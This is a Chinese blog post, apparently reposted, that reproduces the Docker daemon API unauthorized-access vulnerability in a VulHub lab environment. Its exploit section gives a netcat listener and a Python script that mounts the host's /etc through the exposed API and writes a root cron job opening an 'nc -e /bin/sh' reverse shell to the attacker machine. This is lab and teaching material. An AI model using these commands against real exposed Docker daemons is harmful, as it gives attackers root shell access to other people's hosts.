博客
关于我
docker daemon api 未授权访问漏洞复现
阅读量:650 次
发布时间:2019-03-13

本文共 1332 字,大约阅读时间需要 4 分钟。

Docker Daemon API 未授权访问漏洞复现

环境搭建

要复现该漏洞,首先需要一个功能正常的Docker环境。请按照以下步骤操作:

  • 启动Docker服务

    使用以下命令启动Docker服务:

    systemctl start docker
  • 获取VulHub镜像

    克隆包含漏洞示例的GitHub仓库:

    git clone --depth=1 https://github.com/vulhub/vulhub.git  ``
  • 进入目标目录

    使用以下命令进入VulHub中的相关子目录:

    cd vulhub/docker/unauthorized-rce/
  • 启动漏洞示例容器

    使用Docker Compose启动一个Remind容器,该容器会用于触发漏洞:

    docker-compose up -d
  • 验证容器状态

    使用以下命令查看当前运行的容器状态:

    docker ps

    容器应显示一个名为"unauthorized-rce"的容器运行中。此时,可以通过浏览器访问http://127.0.0.1:2375/version验证Docker Daemon API的状态。

  • 漏洞复现

    接下来,我们将引入一个简单的验证脚本来测试漏洞:

  • 获取远程主机IP地址

    确认Kali和CentOS主机的IP地址,例如:

    • Kali:192.138.164.134
    • CentOS:192.168.42.133
  • 启动 listener 监听4444端口

    在Kali机器上使用Netcat监听4444端口:

    nc -lvvp 4444
  • 测试漏洞

    在CentOS机器上运行以下命令,尝试绕过Docker Daemon的权限检查:

    import dockerclientfrom dockerclient import DockerClientclient = DockerClient(base_url='http://192.168.42.133:2375/')data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.138.164.134 4444 -e /bin/sh' > /tmp/etc/crontabs/root" ''', remove=True, volumes={ '/etc': { 'bind': '/tmp/etc', 'mode': 'rw' }})
  • 验证

    当脚本运行完成后,您应该看到以下内容:

  • 腥鸭在Kali机器上显示正处于监听状态(如下图):

    [#] nc -lvvp 4444(Waiting for connection...)
  • 脚本在CentOS机器上成功绕过权限检查,生成cron文件:

    sh -c "echo '* * * * * /usr/bin/nc 192.138.164.134 4444 -e /bin/sh' > /tmp/etc/crontabs/root"
  • 这样,说明我们成功触发了Docker Daemon API 的未授权访问漏洞。

    参考资料

    更多技术细节,请参考以下链接:

    GitHub仓库 README

    转载地址:http://nxzaz.baihongyu.com/

    你可能感兴趣的文章
    MySQL中使用IN()查询到底走不走索引?
    查看>>
    Mysql中使用存储过程插入decimal和时间数据递增的模拟数据
    查看>>
    MySql中关于geometry类型的数据_空的时候如何插入处理_需用null_空字符串插入会报错_Cannot get geometry object from dat---MySql工作笔记003
    查看>>
    mysql中出现Incorrect DECIMAL value: '0' for column '' at row -1错误解决方案
    查看>>
    mysql中出现Unit mysql.service could not be found 的解决方法
    查看>>
    mysql中出现update-alternatives: 错误: 候选项路径 /etc/mysql/mysql.cnf 不存在 dpkg: 处理软件包 mysql-server-8.0的解决方法(全)
    查看>>
    Mysql中各类锁的机制图文详细解析(全)
    查看>>
    MySQL中地理位置数据扩展geometry的使用心得
    查看>>
    Mysql中存储引擎简介、修改、查询、选择
    查看>>
    Mysql中存储过程、存储函数、自定义函数、变量、流程控制语句、光标/游标、定义条件和处理程序的使用示例
    查看>>
    mysql中实现rownum,对结果进行排序
    查看>>
    mysql中对于数据库的基本操作
    查看>>
    Mysql中常用函数的使用示例
    查看>>
    MySql中怎样使用case-when实现判断查询结果返回
    查看>>
    Mysql中怎样使用update更新某列的数据减去指定值
    查看>>
    Mysql中怎样设置指定ip远程访问连接
    查看>>
    mysql中数据表的基本操作很难嘛,由这个实验来带你从头走一遍
    查看>>
    Mysql中文乱码问题完美解决方案
    查看>>
    mysql中的 +号 和 CONCAT(str1,str2,...)
    查看>>
    Mysql中的 IFNULL 函数的详解
    查看>>